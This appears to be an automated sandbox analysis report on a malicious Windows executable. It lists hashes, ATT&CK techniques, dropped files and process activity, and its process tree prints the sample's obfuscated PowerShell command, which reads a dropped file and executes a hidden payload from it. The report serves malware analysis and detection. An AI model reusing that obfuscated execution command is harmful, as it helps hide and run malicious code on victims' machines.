a3ab1ca451d4b020eea6ba2d62e987412bd3b09a4993ea803c8105e932274177

Analysis

max time kernel
18s
max time network
19s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
09/02/2025, 04:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ad7944585459312eceb71221e89b7018.exe
Size

1.3MB
MD5

ad7944585459312eceb71221e89b7018
SHA1

74a633aeb8b7214cd035a9a767d6b8e7796e6886
SHA256

a3ab1ca451d4b020eea6ba2d62e987412bd3b09a4993ea803c8105e932274177
SHA512

f30d3446a95e7d7b927b27efd70f3be9f28177e0cabaa634d2cf440937578b8752152bad62b9876234fee964f2a9ed1cc76ca75153cf754a8156f49d53beed9e
SSDEEP

24576:/orvz2P1S4CcWArIu/YmM3LmTwoSXo9OvOJ2Vioy:ke5taMM3Lxoh9OAKioy

Score

7^/10

discovery execution

Malware Config

Signatures

Loads dropped DLL 1 IoCs

pid	Process
2100	ad7944585459312eceb71221e89b7018.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\stormlbet.ini	ad7944585459312eceb71221e89b7018.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2576	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ad7944585459312eceb71221e89b7018.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2576	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2576	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2100 wrote to memory of 2576	2100	ad7944585459312eceb71221e89b7018.exe	30
PID 2100 wrote to memory of 2576	2100	ad7944585459312eceb71221e89b7018.exe	30
PID 2100 wrote to memory of 2576	2100	ad7944585459312eceb71221e89b7018.exe	30
PID 2100 wrote to memory of 2576	2100	ad7944585459312eceb71221e89b7018.exe	30

C:\Users\Admin\AppData\Local\Temp\ad7944585459312eceb71221e89b7018.exe
"C:\Users\Admin\AppData\Local\Temp\ad7944585459312eceb71221e89b7018.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2100
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle minimized "$Hospitalsbehandlede=gc -Raw 'C:\Users\Admin\AppData\Roaming\inexorableness\vildfre\Norby.Drs';$Brugtpriss=$Hospitalsbehandlede.SubString(53539,3);.$Brugtpriss($Hospitalsbehandlede)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Mucinogen.lnk

Filesize
760B

MD5
c4130e2761c103362527cf5dd63a78ec

SHA1
ea20be9826bb829b6cfe25ca8a49fe151bb8976a

SHA256
d759df66af5e9e596e148d970f60b9d701113fffd7f9699e1cb268f9f2b0bb5c

SHA512
b78c6291cc749ebdac52fa14f9b30100cba623efb8ad21d2efd0641328383852e251de4b4698ef6bc6fb15ebb2911e3eb36ae2ffd85ce6343cc94fe31ea8f060

Download Submit
\Users\Admin\AppData\Local\Temp\nseE504.tmp\nsExec.dll

Filesize
6KB

MD5
ec62e1a8d16d8f1b0eb792aa26e5de5c

SHA1
faa219618aec99cffb81c312728dc56c1fdc5798

SHA256
193d396fc7be5fed9d585de3c43e23d640c1dce725499f0274b3898c248545aa

SHA512
cb3f3458cf734ab7b964ed25cac87ff2938292eed9caae1305b2e5975bde885f4d8b06d05d4099ef614982cd55d97e9ddc0f13bbe2cdd9fb642d008788ed3017

Download Submit
memory/2576-1159-0x0000000073AB1000-0x0000000073AB2000-memory.dmp

Filesize
4KB

Download
memory/2576-1160-0x0000000073AB0000-0x000000007405B000-memory.dmp

Filesize
5.7MB

Download
memory/2576-1161-0x0000000073AB0000-0x000000007405B000-memory.dmp

Filesize
5.7MB

Download
memory/2576-1162-0x0000000073AB0000-0x000000007405B000-memory.dmp

Filesize
5.7MB

Download
memory/2576-1163-0x0000000073AB0000-0x000000007405B000-memory.dmp

Filesize
5.7MB

Download